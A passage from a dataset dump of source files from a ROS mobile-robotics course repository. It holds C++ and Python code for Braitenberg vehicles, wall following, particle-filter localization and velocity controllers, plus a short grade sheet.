l_tolerance_;\n\n double a_max_vel_;\n double a_tolerance_;\n\n};\n\n#endif /* DIFF_VELOCITY_CONTROLLER_H */\n\n"
},
{
"alpha_fraction": 0.6680107712745667,
"alphanum_fraction": 0.676075279712677,
"avg_line_length": 27.596153259277344,
"blob_id": "8ad7ed9bc642912eff348e9d728a2dc4d3fb0be1",
"content_id": "26d6e033f36feeb8cdb4dc1448f09eee4e19c76e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1488,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 52,
"path": "/amr_braitenberg/include/braitenberg_vehicle.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef BRAITENBERG_VEHICLE_H\n#define BRAITENBERG_VEHICLE_H\n\n#include <memory>\n\nclass BraitenbergVehicle\n{\n\npublic:\n\n typedef std::unique_ptr<BraitenbergVehicle> UPtr;\n\n /** Braitenberg vehicle type. */\n enum Type\n {\n TYPE_A, ///< direct connections\n TYPE_B, ///< cross connections\n TYPE_C, ///< direct and cross connections\n };\n\n /** Default constructor creates a vehicle of type A with the connection\n * factor equal to 1. */\n BraitenbergVehicle();\n\n /** Construct a braitenberg vehicle of the desired type.\n *\n * @a factor2 has an effect only for vehicles of type C, therefore this\n * parameter may be omitted when constructing vehicles of other types. */\n BraitenbergVehicle(Type type, float factor1, float factor2 = 0.0);\n\n ~BraitenbergVehicle() { };\n\n /** Compute wheel speeds of the vehicle depending on the input from sonars.\n *\n * @param left_in : left sonar reading scaled by its maximum range, i.e.\n * proximity to an obstacle (in interval [0..1]), where 0 means\n * contact, and 1 means that there are no obstacles in the sonar\n * range.\n * @param right_in : same as @a left_in, but for the right sonar.\n * @param left_out : computed left wheel speed.\n * @param right_out : computed right wheel speed. */\n void computeWheelSpeeds(float left_in, float right_in, float& left_out, float& right_out);\n\nprivate:\n\n Type type_;\n float factor1_;\n float factor2_;\n\n};\n\n#endif /* BRAITENBERG_VEHICLE_H */\n\n"
},
{
"alpha_fraction": 0.7148726582527161,
"alphanum_fraction": 0.7156943082809448,
"avg_line_length": 28.658536911010742,
"blob_id": "5688b3289762d15d666f8d7987060d02e9eb26ab",
"content_id": "7542d185a6921d5297f1fdffeca757aa722b0e10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1217,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 41,
"path": "/amr_localization/include/particle.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef PARTICLE_H\n#define PARTICLE_H\n\n#include <vector>\n\n#include \"pose.h\"\n\n/** Representation of a weighted particle for the particle filter.\n *\n * This structure represents a particle of the particle filter, composed of the\n * robot's assumed pose and the weight assigned to this pose based on\n * observation match. */\nstruct Particle\n{\n /** Robot pose proposed by this particle. */\n Pose pose;\n\n /** Importance of this particle after observation update.\n *\n * Measured as match between real observation and simulated observation from\n * this particle's pose. This should be a positive value between 0 and some\n * limit @c max_weight, such that a value close to zero indicate bad match\n * with real observation and a value close to @c max_weight indicates almost\n * perfect match. */\n double weight;\n\n /** Particle comparison operator (based on weight).\n *\n * Implementing this operator allows to use standard library algorithms to\n * find minimum and maximum elements in a vector of Particles, or sort it. */\n bool operator<(const Particle& rhs) const\n {\n return this->weight < rhs.weight;\n }\n\n};\n\ntypedef std::vector<Particle> ParticleVector;\n\n\n#endif /* PARTICLE_H */\n\n"
},
{
"alpha_fraction": 0.6543624401092529,
"alphanum_fraction": 0.7063758373260498,
"avg_line_length": 26.136363983154297,
"blob_id": "3a824239831242dbfdaa12bf5d3ce7a265278139",
"content_id": "f280571f3ae5e98db41fcd54b93e39d5be89b90b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 596,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 22,
"path": "/grades/20140614.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments and documentation: 1/1\n* Random node generation\n * Generation of random nodes: 0.5/0.5\n * Test for reachability of a new node: 0.5/0.5\n * Try to plan before generating random nodes: 0.5/0.5\n (this applies only if the graph is not thrown away after each planning)\n * Try to plan after each new random node: 0.5/0.5\n* Edge creation\n * Creates edges as expected: 0.5/0.5\n * Re-uses the information about connectivity obtained during node generation: 0.5/0.5\n* Implements/uses A-star search: 1/1\n* Planning timeout 1/1\n\n_Total:_ 6 points\n\nFeedback\n========\n\nNice job!"
},
{
"alpha_fraction": 0.5998269319534302,
"alphanum_fraction": 0.6107059121131897,
"avg_line_length": 42.4892463684082,
"blob_id": "0017c32189faa30a6262266194a2426114b915c1",
"content_id": "a1c8d0fe9c2f6269b06659b397209e69d64eec62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8089,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 186,
"path": "/amr_bugs/src/amr_bugs/wallfollower_state_machine.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\"\nThis module provides a single construct() function which produces a Smach state\nmachine that implements wallfollowing behavior.\n\nThe constructed state machine has three attached methods:\n * set_ranges(ranges): this function should be called to update the range\n readings\n * get_twist(): returns a twist message that could be directly passed to the\n velocity publisher\n * set_config(config): updates the machine userdata with the new config\n\nThe constructed state machine is preemptable, i.e. each state checks whether\na preemption is requested and returns 'preempted' if that is the case.\n\"\"\"\n\nPACKAGE = 'amr_bugs'\n\nimport roslib\nroslib.load_manifest(PACKAGE)\nimport smach\nfrom preemptable_state import PreemptableState\nfrom math import copysign, sqrt, radians, cos\nfrom types import MethodType\nfrom geometry_msgs.msg import Twist\n\nimport rospy\n\n\n__all__ = ['construct']\n\n# Aligns the vehicle to the wall.\ndef align_to_wall(ud):\n if abs(ud.side_difference) < ud.aligned_limit and ud.side_min < 1.0:\n return 'follow_wall'\n \n ud.velocity = (0, 0, ud.speed_max)\n pass\n\n# Moves in a spiral to find an object with its side.\ndef find_wall(ud):\n # Switches to state align to wall, if the vehicle is not aligned to wall.\n if abs(ud.side_difference) >= ud.aligned_limit:\n return 'align_to_wall'\n \n # Switches to state follow wall, if the range is lower than maximum. That means there is an object.\n if ud.side_min < ud.range_max:\n return 'follow_wall'\n \n # Angular Velocity is reduced to make the spiral bigger.\n ud.spiral_speed = max(ud.spiral_speed - 0.001, 0.1)\n ud.velocity = (ud.speed_max, 0, ud.spiral_speed)\n pass\n\n# Follows a wall.\ndef follow_wall(ud):\n # Switches to find wall. if range is maximum. That means there is no object to follow.\n if ud.side_min >= ud.range_max:\n ud.spiral_speed = ud.spiral_speed_max\n return 'find_wall'\n \n # The sensor used to detect obstacle in front of the vehicle is at 30 degrees and the distance to\n # the middle sensor is 60 degrees. If the vehicle follows the wall, than this sensor should have \n # the range: clearance/cos(60). If that is smaller, than there is and object in front of the vehicle.\n front_clearance = ud.clearance / cos(radians(60))\n \n # Error values for the P-Controller are calculated.\n error_angle = ud.side_difference\n error_distance = ud.clearance - ud.side_min\n error_edge = max(front_clearance - ud.range_front, -0.01)\n \n # Sum of the angle error\n ud.error_angle_sum = min(max(ud.error_angle_sum + error_angle + error_edge, -3), 3)\n \n # P-Controllers for all speeds and speeds are limites, angular speed has also an I-Part\n angular_speed = min(max(0.5 * error_angle + ud.error_angle_sum * 0.03 + 2.0 * error_edge, -ud.speed_max), ud.speed_max)\n side_speed = min(max(1.0 * error_distance, -ud.speed_max), ud.speed_max) \n # Forward speed gets reduces by the size of angular speed, to make better turns.\n forward_speed = min(max(ud.speed_max - abs(angular_speed), 0), ud.speed_max)\n \n ud.velocity = (forward_speed, side_speed, angular_speed)\n pass\n\n#==============================================================================\n\ndef set_ranges(self, ranges):\n \"\"\"\n This function will be attached to the constructed wallfollower machine.\n Its argument is a list of Range messages as received by a sonar callback.\n \"\"\"\n # Switches the sensors based on which side is used to follow a wall.\n if self.userdata.mode == 0:\n self.userdata.full_side_min = min(ranges[0].range, ranges[1].range, ranges[14].range, ranges[15].range)\n self.userdata.side_min = min(ranges[0].range, ranges[15].range)\n self.userdata.side_difference = ranges[15].range - ranges[0].range\n self.userdata.range_front = ranges[2].range\n elif self.userdata.mode == 1:\n self.userdata.full_side_min = min(ranges[6].range, ranges[7].range, ranges[8].range, ranges[9].range)\n self.userdata.side_min = min(ranges[7].range, ranges[8].range)\n self.userdata.side_difference = ranges[8].range - ranges[7].range\n self.userdata.range_front = ranges[5].range\n\ndef get_twist(self):\n \"\"\"\n This function will be attached to the constructed wallfollower machine.\n It creates a Twist message that could be directly published by a velocity\n publisher. The values for the velocity components are fetched from the\n machine userdata.\n \"\"\"\n twist = Twist()\n twist.linear.z = 0\n twist.angular.x = 0\n twist.angular.y = 0\n \n # Switches the sign of the output based on which side is used to follow a wall.\n if self.userdata.mode == 0:\n twist.linear.x = self.userdata.velocity[0]\n twist.linear.y = -self.userdata.velocity[1]\n twist.angular.z = -self.userdata.velocity[2]\n elif self.userdata.mode == 1:\n twist.linear.x = self.userdata.velocity[0]\n twist.linear.y = self.userdata.velocity[1]\n twist.angular.z = self.userdata.velocity[2]\n \n return twist\n\n\ndef set_config(self, config):\n \"\"\"\n This function will be attached to the constructed wallfollower machine.\n It updates the relevant fields in the machine userdata.\n Its argument is the config object that comes from ROS dynamic reconfigure\n client.\n \"\"\"\n self.userdata.mode = config['mode']\n self.userdata.clearance = config['clearance']\n return config\n\n\ndef construct():\n sm = smach.StateMachine(outcomes=['preempted'])\n # Attach helper functions\n sm.set_ranges = MethodType(set_ranges, sm, sm.__class__)\n sm.get_twist = MethodType(get_twist, sm, sm.__class__)\n sm.set_config = MethodType(set_config, sm, sm.__class__) \n # Set initial values in userdata\n sm.userdata.velocity = (0, 0, 0)\n sm.userdata.mode = 1\n sm.userdata.clearance = 0.5\n sm.userdata.spiral_speed_max = 0.7\n sm.userdata.spiral_speed = sm.userdata.spiral_speed_max \n sm.userdata.full_side_min = 0\n sm.userdata.side_min = 0\n sm.userdata.side_difference = 0\n sm.userdata.range_front = 0\n sm.userdata.range_max = 5.0\n sm.userdata.speed_max = 0.5\n sm.userdata.aligned_limit = 0.2\n sm.userdata.error_angle_sum = 0\n \n # Add states\n with sm:\n smach.StateMachine.add('ALIGN_TO_WALL',\n PreemptableState(align_to_wall,\n input_keys=['side_min', 'range_max', 'side_difference', 'speed_max', 'aligned_limit'],\n output_keys=['velocity'],\n outcomes=['follow_wall', 'find_wall']),\n transitions={'follow_wall': 'FOLLOW_WALL',\n 'find_wall': 'FIND_WALL'})\n \n smach.StateMachine.add('FIND_WALL',\n PreemptableState(find_wall,\n input_keys=['speed_max', 'side_min', 'side_difference', 'range_max', 'spiral_speed', 'aligned_limit'],\n output_keys=['velocity', 'spiral_speed'],\n outcomes=['follow_wall', 'align_to_wall']),\n transitions={'follow_wall': 'FOLLOW_WALL',\n 'align_to_wall': 'ALIGN_TO_WALL'})\n \n smach.StateMachine.add('FOLLOW_WALL',\n PreemptableState(follow_wall,\n input_keys=['error_angle_sum', 'speed_max', 'side_difference', 'range_max', 'range_front', 'side_min', 'clearance', 'spiral_speed', 'spiral_speed_max'],\n output_keys=['velocity', 'spiral_speed', 'error_angle_sum'],\n outcomes=['find_wall']),\n transitions={'find_wall': 'FIND_WALL'})\n return sm\n"
},
{
"alpha_fraction": 0.6407679915428162,
"alphanum_fraction": 0.6513547301292419,
"avg_line_length": 31.208091735839844,
"blob_id": "5ef46cb629eec49e8cc78c5920e52804168bb411",
"content_id": "9ec93829b52d01e6309ea2dfa20bdebc9a72a0b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5573,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 173,
"path": "/amr_localization/nodes/pose_likelihood_server.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#define _USE_MATH_DEFINES\n#include <cmath>\n\n#include <ros/ros.h>\n#include <ros/console.h>\n#include <ros/assert.h>\n#include <tf/transform_listener.h>\n#include <tf/tf.h>\n#include <sensor_msgs/LaserScan.h>\n#include <amr_srvs/GetPoseLikelihood.h>\n#include <amr_srvs/GetNearestOccupiedPointOnBeam.h>\n#include <amr_srvs/SwitchRanger.h>\n\nclass PoseLikelihoodServerNode\n{\n\npublic:\n\n // Constructor\n PoseLikelihoodServerNode()\n {\n ros::NodeHandle pn(\"~\");\n laserscan_subscriber_ = nh_.subscribe(\"/scan_front\", 1, &PoseLikelihoodServerNode::laserCallback, this);\n beam_client_ = nh_.serviceClient<amr_srvs::GetNearestOccupiedPointOnBeam> (\"/occupancy_query_server/get_nearest_occupied_point_on_beam\");\n likelihood_server_ = pn.advertiseService(\"/pose_likelihood_server/get_pose_likelihood\", &PoseLikelihoodServerNode::likelihoodCallback, this);\n ROS_INFO(\"Started [pose_likelihood_server] node.\");\n getLaserTransform();\n }\n\n // Step 1: Get position of laser in respect to the base\n void getLaserTransform()\n {\n try\n {\n listener.waitForTransform(\"/base_link\", \"/base_laser_front_link\", ros::Time(0), ros::Duration(2.0));\n listener.lookupTransform(\"/base_link\", \"/base_laser_front_link\", ros::Time(0), laser_transform);\n }\n catch (tf::TransformException& ex)\n {\n ROS_ERROR(\"Transform lookup failed: %s\", ex.what());\n }\n }\n\n // Step 2: Get the sensed laser scans and store them.\n void laserCallback(const sensor_msgs::LaserScanConstPtr& msg)\n {\n // Gets parameters of the laser\n range_max = msg->range_max;\n angle_min = msg->angle_min;\n angle_increment = msg->angle_increment;\n no_of_lasers = lround(std::abs(msg->angle_max - angle_min) / angle_increment) + 1;\n\n // Saves the all real sensed readings as z_r\n for (int i = 0; i < no_of_lasers; i++)\n {\n z_r[i] = msg->ranges[i];\n }\n }\n\n // Step 3: Implement likelihood callback\n bool likelihoodCallback(amr_srvs::GetPoseLikelihood::Request& request, amr_srvs::GetPoseLikelihood::Response& response)\n {\n // This datatype is passed around in ROS messages and is just a data storage with no associated functions.\n geometry_msgs::Pose pose_msg;\n pose_msg = request.pose.pose;\n // Convert pose message to transform\n tf::Transform pose_tf;\n tf::poseMsgToTF(pose_msg, pose_tf);\n // Send the request to OQS.\n amr_srvs::GetNearestOccupiedPointOnBeam srv_pointonbeam;\n std::vector<geometry_msgs::Pose2D> beams_poses;\n beams_poses.resize(16);\n\n for (int i = 0; i < no_of_lasers; i++)\n {\n query_input = pose_tf * laser_transform;// Transforming beam_pose from base link to odom\n\n // Extracting beam_pose x,y,theta w.r.t odom\n beams_poses[i].x = query_input.getOrigin().getX();\n beams_poses[i].y = query_input.getOrigin().getY();\n tf::Quaternion quaternion = query_input.getRotation();\n beams_poses[i].theta = tf::getYaw(quaternion) + angle_min + (angle_increment * i); // Calculates theta of laser sample\n }\n\n srv_pointonbeam.request.beams = beams_poses;\n srv_pointonbeam.request.threshold = 50.0;// Changing this changes the no. of red squares.\n\n if (beam_client_.call(srv_pointonbeam))\n {\n double sigma = 0.5;\n double w = 0.0;\n double sum = 0.0;\n double average_prob = 0.0;\n int count = 0;\n\n for (int i = 0; i < no_of_lasers; i++)\n {\n z_f[i] = srv_pointonbeam.response.distances[i]; // Fake distances\n\n // Clamping distances\n if (z_f[i] > range_max) { z_f[i] = range_max; }\n else if (z_f[i] < 0.0) { z_f[i] = 0.0; }\n\n // Compute the probabilities\n w = (1.0 / (sigma * sqrt(2.0 * M_PI))) * (exp(-pow((z_f[i] - z_r[i]), 2) / (2.0 * pow(sigma, 2))));\n\n sum = sum + w;\n if (std::abs(z_f[i]-z_r[i]) < (sigma * 2)) { count ++; }\n }\n\n average_prob = sum / no_of_lasers;\n\n // Clamping probabilities\n if (average_prob > 1.0) { average_prob = 1.0; }\n else if (average_prob < 0.0) { average_prob = 0.0; }\n\n // Respond as likelihood\n response.likelihood = average_prob;\n// if (count < 12) { response.likelihood = 0; }\n// else { response.likelihood = average_prob; }\n\n return true;\n }\n else\n {\n ROS_WARN(\"Server get nearest occupied point on the beam failed.\");\n return false;\n }\n }\n\nprivate:\n\n ros::NodeHandle nh_;\n ros::Subscriber laserscan_subscriber_;\n ros::ServiceServer likelihood_server_;\n ros::ServiceClient beam_client_;\n int no_of_lasers;\n double range_max;\n double angle_min;\n double angle_increment;\n double z_r[16];\n double z_f[16];\n tf::TransformListener listener;\n tf::StampedTransform sensor_transforms[16];\n tf::StampedTransform laser_transform;\n tf::Transform query_input;\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"pose_likelihood_server\");\n ros::NodeHandle nh;\n // Wait until SwitchRanger service (and hence stage node) becomes available.\n ROS_INFO(\"Waiting for the /switch_ranger service to be advertised...\");\n ros::ServiceClient switch_ranger_client = nh.serviceClient<amr_srvs::SwitchRanger> (\"/switch_ranger\");\n switch_ranger_client.waitForExistence();\n // Make sure that the hokuyo laser is available and enable them.\n amr_srvs::SwitchRanger srv;\n srv.request.name = \"scan_front\";\n srv.request.state = true;\n if (switch_ranger_client.call(srv))\n {\n ROS_INFO(\"Enabled hokuyo laser.\");\n }\n else\n {\n ROS_ERROR(\"Hokuyo laser is not available, shutting down.\");\n return 1;\n }\n PoseLikelihoodServerNode plsn;\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.7159596085548401,
"alphanum_fraction": 0.722626268863678,
"avg_line_length": 47.04854202270508,
"blob_id": "ce52bd5f06e781f90ce798553989265eb4ffe540",
"content_id": "3425dd8c619e197530be36ee76f440443e78c750",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4950,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 103,
"path": "/amr_braitenberg/nodes/braitenberg_vehicle.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "/** Description of behavior:\n *\n * Braitenberg Type A:\n * In this mode the vehicle tries not to crush into obstacles. The vehicle dodges sideways.\n * If the transmission factor is to small the vehicle is slow, can not make fast turns and can still crash.\n * If it is to high and the vehicle is driving between obstacles the vehicle the rotation angle oscillates.\n * And if the factor is negative, the vehicle drives perpendicular away from the obstacle.\n *\n * Braitenberg Type B:\n * A Braitenberg type B tries to reach a light source. In our case that is an obstacle and so the vehicle\n * drives perpendicular to the object and crashes. If the transmission factor is negative, the vehicle drives\n * sideways away from an obstacle.\n *\n * Braitenberg Type C:\n * In this combined mode the turn behaviors of the type A and type B vehicle cancel each other out, but the\n * speed is combined. So if the transmission factor of the type A behavior is higher than the transmission\n * factor for type B than the vehicle tries not to crash into an obstacle. The difference to a pure type\n * A vehicle is than, that it's speed is higher but the turn speed is damped. If the transmission factor of\n * the type B behavior is higher, than the vehicle crashes. If the factors are negative, than the vehicle\n * drives away from the obstacle. And depending on which type has the lowest transmission, the vehicle drives\n * sideways or perpendicular away. */\n\n\n#include <ros/ros.h>\n#include <ros/console.h>\n#include <dynamic_reconfigure/server.h>\n#include <geometry_msgs/Twist.h>\n\n#include <amr_msgs/Ranges.h>\n#include <amr_msgs/WheelSpeeds.h>\n#include <amr_srvs/SwitchRanger.h>\n#include <amr_braitenberg/BraitenbergVehicleConfig.h>\n#include \"braitenberg_vehicle.h\"\n\nros::Subscriber sonar_subscriber;\nros::Publisher wheel_speeds_publisher;\nBraitenbergVehicle::UPtr vehicle;\n\n/** Reconfiguration callback is triggered every time the user changes some\n * field through the rqt_reconfigure interface. */\nvoid reconfigureCallback(amr_braitenberg::BraitenbergVehicleConfig &config, uint32_t level)\n{\n /** To reconfigure a new braitenberg vehicle is created and appointed.\n * Because the config.type is an int value it is beeing casted to the braitenberg vehicle type. */\n vehicle = BraitenbergVehicle::UPtr(new BraitenbergVehicle(static_cast<BraitenbergVehicle::Type>(config.type),\n config.factor1,\n config.factor2));\n\n ROS_INFO(\"Vehicle reconfigured: type %i, factors %.2f and %.2f\", config.type, config.factor1, config.factor2);\n}\n\n/** Sonar callback is triggered every time the Stage node publishes new data\n * to the sonar topic. */\nvoid sonarCallback(const amr_msgs::Ranges::ConstPtr& msg)\n{\n amr_msgs::WheelSpeeds m;\n\n /** To calculate the wheel speeds, the output from the lasers and the speeds are given to the\n * computeWheelSpeeds methods. Because WheelSpeeds is a vector with zero elemnts it's resized\n * to store two speeds for the left and right wheel. The handover of the speeds is done by\n * call-by-reference, so that a return is not needed. Values from the sensors are beeing\n * normalized here as well. */\n m.speeds.resize(2);\n vehicle->computeWheelSpeeds(msg->ranges[0].range / msg->ranges[0].max_range, msg->ranges[1].range / msg->ranges[1].max_range, m.speeds.at(0), m.speeds.at(1));\n\n wheel_speeds_publisher.publish(m);\n ROS_DEBUG(\"[%.2f %.2f] --> [%.2f %.2f]\", msg->ranges[0].range, msg->ranges[1].range, m.speeds[0], m.speeds[1]);\n}\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"braitenberg_vehicle\");\n ros::NodeHandle nh;\n // Wait until SwitchRanger service (and hence stage node) becomes available.\n ROS_INFO(\"Waiting for the /switch_ranger service to be advertised...\");\n ros::ServiceClient switch_ranger_client = nh.serviceClient<amr_srvs::SwitchRanger>(\"/switch_ranger\");\n switch_ranger_client.waitForExistence();\n // Make sure that the braitenberg sonars are available and enable them.\n amr_srvs::SwitchRanger srv;\n srv.request.name = \"sonar_braitenberg\";\n srv.request.state = true;\n if (switch_ranger_client.call(srv))\n {\n ROS_INFO(\"Enabled braitenberg sonars.\");\n }\n else\n {\n ROS_ERROR(\"Braitenberg sonars are not available, shutting down.\");\n return 1;\n }\n // Create default vehicle.\n vehicle = BraitenbergVehicle::UPtr(new BraitenbergVehicle);\n // Create subscriber and publisher.\n sonar_subscriber = nh.subscribe(\"/sonar_braitenberg\", 100, sonarCallback);\n wheel_speeds_publisher = nh.advertise<amr_msgs::WheelSpeeds>(\"/cmd_vel_diff\", 100);\n // Create dynamic reconfigure server.\n dynamic_reconfigure::Server<amr_braitenberg::BraitenbergVehicleConfig> server;\n server.setCallback(boost::bind(&reconfigureCallback, _1, _2));\n // Start infinite loop.\n ROS_INFO(\"Started braitenberg vehicle node.\");\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.6718888282775879,
"alphanum_fraction": 0.6754360198974609,
"avg_line_length": 40.75308609008789,
"blob_id": "51e58545577cc92083679b28f803519fb9e7e114",
"content_id": "ca8f6018ab2f9573962311881e4c7367e0bbfbf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3383,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 81,
"path": "/amr_navigation/src/omni_velocity_controller.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/console.h>\n#include \"omni_velocity_controller.h\"\n\nOmniVelocityController::OmniVelocityController(double l_max_vel, double l_max_acc, double l_tolerance,\n double a_max_vel, double a_max_acc, double a_tolerance)\n: l_max_vel_(l_max_vel)\n, l_max_acc_(l_max_acc)\n, l_tolerance_(l_tolerance)\n, a_max_vel_(a_max_vel)\n, a_max_acc_(a_max_acc)\n, a_tolerance_(a_tolerance)\n{\n // How much time the vehicle needs to stop based on the acceleration\n linear_time_to_break_ = l_max_vel_ / l_max_acc_;\n angular_time_to_break_ = a_max_vel_ / a_max_acc_;\n\n // The formular velocity to time \"f(time) = -accelration_max * time + velocity_max\"\n // is integrated to get the surface of the function, which is the distance to break.\n linear_break_point_ = -(l_max_acc_/2) * pow(linear_time_to_break_, 2) + l_max_vel_ * linear_time_to_break_;\n angular_break_point_ = -(a_max_acc_/2) * pow(angular_time_to_break_, 2) + a_max_vel_ * angular_time_to_break_;\n\n linear_deacceleration_factor_ = l_max_vel_ / linear_break_point_;\n angular_deacceleration_factor_ = a_max_vel_ / angular_break_point_;\n}\n\nvoid OmniVelocityController::setTargetPose(const Pose& pose)\n{\n target_pose_ = pose;\n linear_complete_ = false;\n angular_complete_ = false;\n}\n\nbool OmniVelocityController::isTargetReached() const\n{\n return linear_complete_ & angular_complete_;\n}\n\nVelocity OmniVelocityController::computeVelocity(const Pose& actual_pose)\n{\n // Displacement and orientation to the target in world frame\n double x_dist = target_pose_.x - actual_pose.x;\n double y_dist = target_pose_.y - actual_pose.y;\n\n // Step 1: compute remaining distances\n double linear_dist = getDistance(target_pose_, actual_pose);\n double angular_dist = getShortestAngle(target_pose_.theta, actual_pose.theta);\n\n if (std::abs(linear_dist) < l_tolerance_ && std::abs(angular_dist) < a_tolerance_)\n {\n linear_complete_ = true;\n angular_complete_ = true;\n return Velocity();\n }\n\n // Step 2: compute velocities\n double linear_vel = 0.0;\n double angular_vel = 0.0;\n\n // If the distance is bigger than the break point, than the vehicle drives with maximum speed,\n // else the speed is the distance multiplied with the deacceleration factor to reach the target smoothly.\n if (std::abs(linear_dist) > linear_break_point_) { linear_vel = l_max_vel_; }\n else { linear_vel = linear_dist * linear_deacceleration_factor_; }\n\n if (std::abs(angular_dist) > angular_break_point_) { angular_vel = a_max_vel_; }\n else { angular_vel = angular_dist * angular_deacceleration_factor_; }\n\n // Step 3: Divide linear velocity in velocities for x and y direction\n double x_ratio = x_dist / linear_dist;\n double y_ratio = y_dist / linear_dist;\n\n double x_vel = x_ratio * linear_vel;\n double y_vel = y_ratio * linear_vel;\n\n // Step 4: Velocities for X and Y direction are split to forward movement\n // and sideward movement by rotating around theta.\n return Velocity(+ std::copysign(x_vel, x_dist) * cos(actual_pose.theta)\n + std::copysign(y_vel, y_dist) * sin(actual_pose.theta), // Forward movement\n - std::copysign(x_vel, x_dist) * sin(actual_pose.theta)\n + std::copysign(y_vel, y_dist) * cos(actual_pose.theta), // Sideward movement\n std::copysign(angular_vel, angular_dist)); // Angular movement\n}\n\n"
},
{
"alpha_fraction": 0.7213420271873474,
"alphanum_fraction": 0.7213420271873474,
"avg_line_length": 21.33333396911621,
"blob_id": "0a4b04c8f6c57466207d4e1a73740bc1b1c5aef9",
"content_id": "8e18523cd8f7bc2d9eb2bb2c65c2da46278fe16c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 48,
"path": "/amr_navigation/include/omni_velocity_controller.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef OMNI_VELOCITY_CONTROLLER_H\n#define OMNI_VELOCITY_CONTROLLER_H\n\n#include \"velocity_controller.h\"\n\n/** An implementation of velocity controller that moves the robot as if it had\n * an omni-directional base. */\nclass OmniVelocityController : public VelocityController\n{\n\npublic:\n\n OmniVelocityController(double l_max_vel, double l_max_acc, double l_tolerance,\n double a_max_vel, double a_max_acc, double a_tolerance);\n\n virtual void setTargetPose(const Pose& pose);\n\n virtual bool isTargetReached() const;\n\n virtual Velocity computeVelocity(const Pose& actual_pose);\n\nprivate:\n\n Pose target_pose_;\n\n bool linear_complete_;\n bool angular_complete_;\n\n double l_max_vel_;\n double l_max_acc_;\n double l_tolerance_;\n\n double a_max_vel_;\n double a_max_acc_;\n double a_tolerance_;\n\n double linear_time_to_break_;\n double angular_time_to_break_;\n\n double linear_break_point_;\n double angular_break_point_;\n\n double linear_deacceleration_factor_;\n double angular_deacceleration_factor_;\n\n};\n\n#endif /* OMNI_VELOCITY_CONTROLLER_H */\n\n"
},
{
"alpha_fraction": 0.5427682995796204,
"alphanum_fraction": 0.5489891171455383,
"avg_line_length": 17.342857360839844,
"blob_id": "b4d08f1d78b8aab6208e938f068164ebd1c2acd1",
"content_id": "087e40e58f97ae23d0fa1ad9740d780a3c3fc6ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 643,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 35,
"path": "/amr_navigation/include/pose.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef POSE_H\n#define POSE_H\n\n#include <iostream>\n\n/** This structure represents a pose in 2d space. */\nstruct Pose\n{\n\n float x;\n float y;\n float theta;\n\n Pose() : x(0), y(0), theta(0) { }\n\n Pose(float x, float y, float theta) : x(x), y(y), theta(theta) { }\n\n Pose(const Pose& other) : x(other.x), y(other.y), theta(other.theta) { }\n\n const Pose& operator=(const Pose& other)\n {\n x = other.x;\n y = other.y;\n theta = other.theta;\n return *this;\n }\n\n friend std::ostream& operator<<(std::ostream& out, const Pose& p)\n {\n return out << \"[\" << p.x << \", \" << p.y << \", \" << p.theta << \"]\";\n }\n\n};\n\n#endif /* POSE_H */\n\n"
},
{
"alpha_fraction": 0.6575299501419067,
"alphanum_fraction": 0.6748582124710083,
"avg_line_length": 29.21904754638672,
"blob_id": "090ea4aff105120712bfd43909b685b287182724",
"content_id": "3b436465c4606367cb07883eb8394521f06fd374",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3174,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 105,
"path": "/amr_localization/include/motion_model.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
